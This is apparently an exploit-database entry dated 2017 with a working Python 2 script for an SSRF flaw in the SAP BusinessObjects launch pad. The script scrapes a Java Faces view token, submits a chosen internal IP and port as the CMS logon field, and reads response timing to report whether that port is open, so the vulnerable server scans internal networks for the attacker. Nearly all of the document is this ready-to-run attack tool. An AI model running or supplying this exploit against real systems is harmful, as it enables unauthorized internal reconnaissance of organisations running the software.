# Exploit Title: SAP BusinessObjects launch pad SSRF # Date: 2017-11-8 # Exploit Author: Ahmad Mahfouz # Category: Webapps # Author Homepage: www.unixawy.com # Description: Design Error in SAP BusinessObjects launch pad leads to SSRF attack #!/usr/bin/env python # SAP BusinessObjects launch pad SSRF Timing Attack Port scan # usage : sblpta.py http://path.faces targetIP targetPort import urllib2 import urllib import ssl from datetime import datetime import sys if len(sys.argv) != 4: print "Usage: python sblpta.py http://path.faces targetIP targetPort" sys.exit(1) url = sys.argv[1] targetIP = sys.argv[2] targetPort = sys.argv[3] targetHostIP = "%s:%s" %(targetIP,targetPort) print "\r\n" print "[*] SAP BusinessObjects Timing Attack" headers = {'User-Agent': 'Mozilla/5.0'} gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1) try: request = urllib2.Request(url, headers=headers) page = urllib2.urlopen(request, context=gcontext) print "[*] Connected to SAP Bussiness Object %s" %url except: print "[-] Failed To connect to SAP Bussiness Object %s" %url print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces" sys.exit(2) resheaders = page.info() cookie = resheaders.dict['set-cookie'] content = page.readlines() for line in content: if "com.sun.faces.VIEW" in line: sfview = line.split("=")[4].split("\"")[1] print "[*] Got java faces dynamic value" else: continue if not sfview: print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??" sys.exit(3) formdata = {"_id0:logon:CMS":targetHostIP, "_id0:logon:USERNAME":"", "_id0:logon:PASSWORD":"", "com.sun.faces.VIEW":sfview, "_id0":"_id0" } data_encode = urllib.urlencode(formdata) start = datetime.now() print "[*] Testing Timing Attack %s" %start request = urllib2.Request(url,data_encode) request.add_header('Cookie', cookie) response = urllib2.urlopen(request) end = datetime.now() the_page = response.read() if "FWM" in the_page: elapsedTime = end-start if elapsedTime.total_seconds() >= 10: print "[*] Port %s is Open, Gotcha !!! " %targetPort else: print "[*] Port %s is Closed , we die fast" %targetPort elif "FWC" in the_page: print "[-] error login expired" sys.exit(10)